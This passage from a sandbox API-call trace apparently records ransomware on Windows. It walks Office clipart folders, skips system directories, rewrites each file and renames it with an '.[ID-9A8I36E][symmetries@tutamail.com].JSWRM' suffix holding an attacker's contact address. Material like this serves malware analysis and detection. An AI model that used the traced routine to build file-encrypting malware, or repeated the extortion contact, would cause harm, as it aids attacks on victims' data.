Size=0x1760) returned 0x205850 [0093.746] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1760, lpOverlapped=0x0) returned 1 [0093.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.753] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1760, lpOverlapped=0x0) returned 1 [0093.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.753] CloseHandle (hObject=0x314) returned 1 [0093.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0093.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0093.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0093.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0093.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0093.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.754] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.755] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01247U.BMP", cAlternateFileName="")) returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2=".") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="..") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="...") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="windows") returned -1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="recovery") returned -1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="perflogs") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="documents and settings") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="system volume information") returned -1 [0093.755] lstrcmpiW (lpString1="PH01247U.BMP", lpString2="msocache") returned 1 [0093.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0093.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01247U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01247U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01247U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0093.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01247U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01247U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01247U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.756] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31752) returned 1 [0093.756] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c00) returned 0x24d210 [0093.757] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c00, lpOverlapped=0x0) returned 1 [0093.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.760] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c00, lpOverlapped=0x0) returned 1 [0093.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.761] CloseHandle (hObject=0x314) returned 1 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0093.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0093.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.763] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e55, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01255G.GIF", cAlternateFileName="")) returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2=".") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="..") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="...") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="windows") returned -1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="recovery") returned -1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="perflogs") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="documents and settings") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="system volume information") returned -1 [0093.763] lstrcmpiW (lpString1="PH01255G.GIF", lpString2="msocache") returned 1 [0093.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01255G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01255G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01255G.GIF", lpUsedDefaultChar=0x0) returned 12 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01255G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01255G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01255G.GIF", lpUsedDefaultChar=0x0) returned 12 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.764] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7765) returned 1 [0093.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e50) returned 0x205850 [0093.764] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e50, lpOverlapped=0x0) returned 1 [0093.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.766] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e50, lpOverlapped=0x0) returned 1 [0093.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.766] CloseHandle (hObject=0x314) returned 1 [0093.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0093.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0093.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0093.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0093.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.768] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01265U.BMP", cAlternateFileName="")) returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2=".") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="..") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="...") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="windows") returned -1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="recovery") returned -1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="perflogs") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="documents and settings") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="system volume information") returned -1 [0093.768] lstrcmpiW (lpString1="PH01265U.BMP", lpString2="msocache") returned 1 [0093.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0093.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01265U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01265U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01265U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0093.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01265U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01265U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01265U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.770] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31752) returned 1 [0093.770] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c00) returned 0x24d210 [0093.771] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c00, lpOverlapped=0x0) returned 1 [0093.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.776] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c00, lpOverlapped=0x0) returned 1 [0093.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.777] CloseHandle (hObject=0x314) returned 1 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0093.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: 